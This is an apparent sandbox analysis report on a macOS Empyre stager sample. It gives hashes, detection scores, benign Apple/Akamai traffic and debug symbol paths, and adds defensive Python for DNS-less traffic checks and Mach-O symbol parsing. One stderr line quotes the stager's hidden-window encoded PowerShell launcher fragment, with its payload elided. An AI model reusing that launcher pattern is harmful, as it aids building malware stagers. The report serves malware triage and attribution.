Analysis Report SwWPxGBaKt.macho

Overview

General Information

Sample Name: SwWPxGBaKt.macho
Analysis ID: 538
MD5: 480e81fbccf44939cf4ad4d21f9ba230
SHA1: ff68dd82ddd872b04b8605adfc7be8f42bb38b0e
SHA256: c364dcfa20543edbe9af0c94bedab5d79002277f97dfcbea3a704e5b4f1088e9

Detection

Score: 60
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Process executable has a file extension which is uncommon (probably to disguise the executable)
Contains symbols with paths

Classification

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: SwWPxGBaKt.macho Avira: detected
Multi AV Scanner detection for submitted file
Source: SwWPxGBaKt.macho Virustotal: Detection: 33%
Source: SwWPxGBaKt.macho ReversingLabs: Detection: 44%

Networking:

Source: unknown TCP traffic detected without corresponding DNS query: 17.171.27.65 (observed 3 times)
Source: unknown TCP traffic detected without corresponding DNS query: 17.253.109.202 (observed 2 times)
Source: unknown TCP traffic detected without corresponding DNS query: 2.22.90.177 (observed 2 times)
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Note: 1.1.1.1 is a public DNS resolver, so UDP to it is the name lookup itself. The three TCP peers sit in Apple and Akamai address space (see the Contacted Public IPs table below, where none is marked malicious), which is what macOS background services produce on a fresh sandbox; the lines are a weak signal on their own.
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmp String found in binary or memory: http://crl.apple.com/codesigning.crl0
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmp String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmp String found in binary or memory: http://www.apple.com/appleca/root.crl0
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmp String found in binary or memory: http://www.apple.com/certificateauthority0
Source: SwWPxGBaKt.macho, 00000571.00000271.9.00000001030f6000.00000001030f9000.r--.sdmp String found in binary or memory: https://www.apple.com/appleca/0
Source: SwWPxGBaKt.macho, 00000571.00000271.9.0000000103002000.0000000103042000.rw-.sdmp String found in binary or memory: https://www.python.org/psf/license/
Note: the five apple.com URLs are the CRL and CA pointers carried by an embedded Apple code-signing certificate chain, not contacted hosts. The python.org license string indicates a bundled Python runtime, consistent with the PythonInObjc symbol paths under Data Obfuscation.
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49238
Source: unknown Network traffic detected: HTTP traffic on port 49238 -> 443
Source: classification engine Classification label: mal60.evad.macMACHO@0/0@0/0
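The "traffic without corresponding DNS query" lines above are what the sandbox derives from its capture. The following Python is an added example (not part of this report and not the sandbox vendor's code) that reproduces that check over a constructed set of events modelled on the observations here, so the logic can be applied to one's own pcap-derived logs. The DNS answers, timestamps, the 198.51.100.7 and 203.0.113.10 peers and the owner table are assumptions for illustration; the only fact it relies on beyond this report is that 17.0.0.0/8 is Apple's address block. It also shows two things the raw lines do not: traffic to the resolver itself is excluded rather than flagged, and a connection that precedes the DNS answer for its address is still flagged.

```python
import ipaddress
from dataclasses import dataclass
from typing import Dict, List, Set


@dataclass
class DnsAnswer:
    t: float            # seconds since capture start
    qname: str
    answers: List[str]  # A records returned for qname


@dataclass
class Conn:
    t: float
    proto: str          # "tcp" or "udp"
    dst: str
    dport: int


# Constructed fixture modelled on this report's observations (not a real capture).
DNS = [
    DnsAnswer(0.9, "cdn.example.invalid", ["198.51.100.7"]),      # answered only after the first connection to it
    DnsAnswer(1.0, "updates.example.invalid", ["203.0.113.10"]),
]
CONNS = [
    Conn(0.2, "tcp", "198.51.100.7", 443),   # connection precedes the DNS answer: still flagged
    Conn(0.5, "udp", "1.1.1.1", 53),         # the lookup itself, sent to a public resolver
    Conn(2.0, "tcp", "17.171.27.65", 443),
    Conn(3.0, "tcp", "17.171.27.65", 443),
    Conn(4.0, "tcp", "17.171.27.65", 443),
    Conn(5.0, "tcp", "17.253.109.202", 443),
    Conn(6.0, "tcp", "2.22.90.177", 443),
    Conn(7.0, "tcp", "17.253.109.202", 443),
    Conn(8.0, "tcp", "2.22.90.177", 443),
    Conn(9.0, "tcp", "203.0.113.10", 443),   # resolved beforehand: not flagged
]
RESOLVERS: Set[str] = {"1.1.1.1"}

# Ownership hints: 17.0.0.0/8 is Apple's block; the Akamai entry is the single IP from this report's ASN table.
OWNER_TABLE = {
    ipaddress.ip_network("17.0.0.0/8"): "Apple (AS714 / AS6185)",
    ipaddress.ip_network("2.22.90.177/32"): "Akamai (AS20940)",
}


def owner_of(ip: str) -> str:
    addr = ipaddress.ip_address(ip)
    for net, owner in OWNER_TABLE.items():
        if addr in net:
            return owner
    return "unknown"


def connections_without_dns(dns: List[DnsAnswer], conns: List[Conn], resolvers: Set[str]) -> List[Conn]:
    """Flag every connection whose destination was not returned by a DNS answer seen before it."""
    answers = sorted(dns, key=lambda a: a.t)
    flagged = []
    for c in sorted(conns, key=lambda c: c.t):
        if c.dport == 53 and c.dst in resolvers:
            continue  # this *is* the DNS traffic, not a DNS-less peer
        resolved = {ip for a in answers if a.t <= c.t for ip in a.answers}
        if c.dst not in resolved:
            flagged.append(c)
    return flagged


def triage_report(dns: List[DnsAnswer], conns: List[Conn], resolvers: Set[str]) -> List[Dict]:
    """Collapse repeated hits per (proto, dst, port) in first-seen order and attach an ownership hint."""
    rows: Dict[tuple, Dict] = {}
    for c in connections_without_dns(dns, conns, resolvers):
        key = (c.proto, c.dst, c.dport)
        if key not in rows:
            rows[key] = {"proto": c.proto, "dst": c.dst, "dport": c.dport, "count": 0, "owner": owner_of(c.dst)}
        rows[key]["count"] += 1
    return list(rows.values())


if __name__ == "__main__":
    for row in triage_report(DNS, CONNS, RESOLVERS):
        print(f"{row['proto'].upper()} without DNS: {row['dst']}:{row['dport']} x{row['count']} ({row['owner']})")
```

Run on the fixture it reports four peers, the three from this report plus the constructed early connection; the owner column is what lets an analyst separate platform noise from a peer worth pivoting on.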

Data Obfuscation:

Contains symbols with paths
Source: submission SwWPxGBaKt.macho Mach-O symbol: /Users/cross/Library/Developer/Xcode/DerivedData/launcher-fawtdwnnxsoauhdakgxckdmlpaqw/Build/Intermediates/launcher.build/Debug/launcher.build/Objects-normal/x86_64/main.o
Source: submission SwWPxGBaKt.macho Mach-O symbol: /Users/cross/Library/Developer/Xcode/DerivedData/launcher-fawtdwnnxsoauhdakgxckdmlpaqw/Build/Intermediates/launcher.build/Debug/launcher.build/Objects-normal/x86_64/AppDelegate.o
Source: submission SwWPxGBaKt.macho Mach-O symbol: /Users/cross/Documents/PythonInObjc/BundledEmpyreLauncher/EmpyreStager/EmpyreStager/
Note: these are debug-build object and source paths left in the symbol table (a Debug configuration under DerivedData, never stripped). They give the builder's account name (cross) and the project name (BundledEmpyreLauncher / EmpyreStager), which is the most useful attribution lead in this report.
Source: submitted sample Stderr: File '<string>', line 1: wershell -noP -sta -w 1 -enc [base64 argument elided in this copy of the report] ^ SyntaxError: invalid syntax; exit code = 0
Note: the stager passed a string beginning "wershell -noP -sta -w 1 -enc ..." (a PowerShell one-liner with its first characters cut off) to the embedded Python interpreter, which rejected it with a SyntaxError on line 1 and the process still exited 0. The sample therefore did not reach its intended second stage in this run, which also explains why the only network activity is platform background traffic.
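To reproduce the "Contains symbols with paths" check outside the sandbox, here is an added Python example, not taken from this report or from the sandbox vendor. It parses the LC_SYMTAB load command of a little-endian 64-bit Mach-O using only the standard library, returns the N_SO/N_OSO debugger stabs plus any other symbol whose name is an absolute path, and extracts the account name from /Users/<name>/ paths, which is the attribution lead the lines above provide. Because the real sample cannot be embedded, the block also builds a minimal, non-loadable Mach-O fixture from the symbol strings quoted above; that fixture, the extra `_main` and `_objc_msgSend` entries and all helper names are assumptions. Fat (universal) and 32-bit images are deliberately not handled.

```python
import struct
from typing import Dict, List, Tuple

MH_MAGIC_64 = 0xFEEDFACF
LC_SYMTAB = 0x2
N_STAB = 0xE0      # any of these bits set means a debugger (stab) entry
N_SO = 0x64        # stab: source file / directory path
N_OSO = 0x66       # stab: object file path the linker recorded (the DerivedData .o paths in this report)
N_SECT = 0x0E      # ordinary defined symbol, not a stab
N_EXT = 0x01       # ordinary external symbol

HEADER_FMT = "<IiiIIIII"   # mach_header_64, 32 bytes
SYMTAB_FMT = "<IIIIII"     # symtab_command, 24 bytes
NLIST_FMT = "<IBBHQ"       # nlist_64, 16 bytes


def build_fixture(symbols: List[Tuple[str, int]]) -> bytes:
    """Constructed fixture: a minimal little-endian 64-bit Mach-O whose only load command is LC_SYMTAB.
    It is not loadable; it exists so the parser below can run offline."""
    strtab = b"\x00"                    # string index 0 is reserved for the empty name
    nlists = b""
    for name, n_type in symbols:
        nlists += struct.pack(NLIST_FMT, len(strtab), n_type, 0, 0, 0)
        strtab += name.encode() + b"\x00"
    symoff = struct.calcsize(HEADER_FMT) + struct.calcsize(SYMTAB_FMT)
    stroff = symoff + len(nlists)
    header = struct.pack(HEADER_FMT, MH_MAGIC_64, 0x01000007, 3, 2, 1, struct.calcsize(SYMTAB_FMT), 0, 0)
    symtab = struct.pack(SYMTAB_FMT, LC_SYMTAB, struct.calcsize(SYMTAB_FMT), symoff, len(symbols), stroff, len(strtab))
    return header + symtab + nlists + strtab


def path_symbols(data: bytes) -> List[Tuple[int, str]]:
    """(n_type, name) for every N_SO/N_OSO stab and every other symbol whose name is an absolute path."""
    magic, _, _, _, ncmds, _, _, _ = struct.unpack_from(HEADER_FMT, data, 0)
    if magic != MH_MAGIC_64:
        raise ValueError("only little-endian 64-bit Mach-O is handled here (no fat or 32-bit images)")
    off = struct.calcsize(HEADER_FMT)
    symtab = None
    for _ in range(ncmds):
        cmd, cmdsize = struct.unpack_from("<II", data, off)
        if cmd == LC_SYMTAB:
            symtab = struct.unpack_from(SYMTAB_FMT, data, off)
        off += cmdsize
    if symtab is None:
        return []
    _, _, symoff, nsyms, stroff, strsize = symtab
    strtab = data[stroff:stroff + strsize]
    hits = []
    for i in range(nsyms):
        n_strx, n_type, _, _, _ = struct.unpack_from(NLIST_FMT, data, symoff + i * struct.calcsize(NLIST_FMT))
        end = strtab.find(b"\x00", n_strx)
        name = strtab[n_strx:end if end >= 0 else None].decode("utf-8", "replace")
        if (n_type & N_STAB and n_type in (N_SO, N_OSO)) or name.startswith("/"):
            hits.append((n_type, name))
    return hits


def developer_accounts(hits: List[Tuple[int, str]]) -> List[str]:
    """Account names taken from /Users/<name>/... paths."""
    names = set()
    for _, name in hits:
        parts = name.split("/")
        if len(parts) > 3 and parts[1] == "Users" and parts[2]:
            names.add(parts[2])
    return sorted(names)


def triage(data: bytes) -> Dict[str, List[str]]:
    hits = path_symbols(data)
    return {"paths": [name for _, name in hits], "accounts": developer_accounts(hits)}


# Fixture built from the symbol strings quoted in this report plus two ordinary (non-path) symbols.
FIXTURE = build_fixture([
    ("/Users/cross/Documents/PythonInObjc/BundledEmpyreLauncher/EmpyreStager/EmpyreStager/", N_SO),
    ("/Users/cross/Library/Developer/Xcode/DerivedData/launcher-fawtdwnnxsoauhdakgxckdmlpaqw/Build/Intermediates/launcher.build/Debug/launcher.build/Objects-normal/x86_64/main.o", N_OSO),
    ("_main", N_SECT | N_EXT),
    ("_objc_msgSend", N_EXT),
])

if __name__ == "__main__":
    print(triage(FIXTURE))
```

On a real file the same entries can be cross-checked with Apple's toolchain (`nm -a` includes debugger stabs, so `nm -a sample | grep ' OSO '` lists the object paths); `strip` removes them, which is why their presence points at a debug build that was never cleaned before distribution.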

Hooking and other Techniques for Hiding and Protection:

Process executable has a file extension which is uncommon (probably to disguise the executable)
Source: /Library/Frameworks/Mono.framework/Versions/4.4.2/bin/mono-sgen32 (PID: 571) Process executable with extension: /Users/berri/Desktop/SwWPxGBaKt.macho
Note: the .macho suffix is the name the file was submitted under, so this signature may reflect the submitter's renaming rather than the name used in the wild; it should not be weighted on its own.
Source: /Users/berri/Desktop/SwWPxGBaKt.macho (PID: 571) System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist (observed 2 times)

Contacted Public IPs

IP              Domain   Country         ASN    ASN Name             Malicious
17.171.27.65    unknown  United States   714    APPLE-ENGINEERINGUS  false
17.253.109.202  unknown  United States   6185   APPLE-AUSTINUS       false
2.22.90.177     unknown  European Union  20940  AKAMAI-ASN1EU        false